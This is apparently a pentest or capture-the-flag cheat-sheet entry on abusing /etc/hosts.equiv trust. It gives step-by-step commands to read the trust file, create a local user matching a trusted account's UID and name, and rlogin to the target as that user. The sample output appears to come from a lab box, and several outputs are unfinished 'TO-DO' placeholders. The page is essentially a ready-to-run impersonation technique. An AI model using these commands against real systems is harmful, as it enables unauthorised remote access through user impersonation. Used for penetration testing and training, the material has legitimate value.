Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1: Fake a User
1. Check
cat /etc/hosts.equiv
Sample Output:
(remote) www-data@reset:/home/sadm$ cat /etc/hosts.equiv
# /etc/hosts.equiv: list of hosts and users that are granted "trusted" r
# command access to your system .
- root
- local
+ sadm
2. Create the Target User Locally
# Create a fake user
sudo adduser --uid <UID> <USER>
Sample Output:
TO-DO# Switch user
su <USER>
Sample Output:
TO-DO3. Connect
# Installation
sudo apt install rsh-redone-client
Sample Output:
TO-DO# Connect
rlogin <TARGET>
Sample Output:
TO-DO4. Revert
sudo userdel <USER>
Sample Output:
TO-DO